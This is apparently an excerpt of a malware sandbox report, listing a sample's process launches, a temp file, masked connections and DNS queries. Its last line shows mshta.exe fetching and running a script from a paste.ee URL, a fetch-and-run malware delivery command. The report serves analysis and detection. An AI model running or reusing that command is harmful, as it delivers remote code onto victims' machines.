Техническая информация
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\1387129.cvr
- 'pa##e.ee':443
- 'oc##.#tartssl.com':80
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- DNS ASK oc##.#tartssl.com
- '<SYSTEM32>\mshta.exe' https://paste.ee/d/fBhHV/0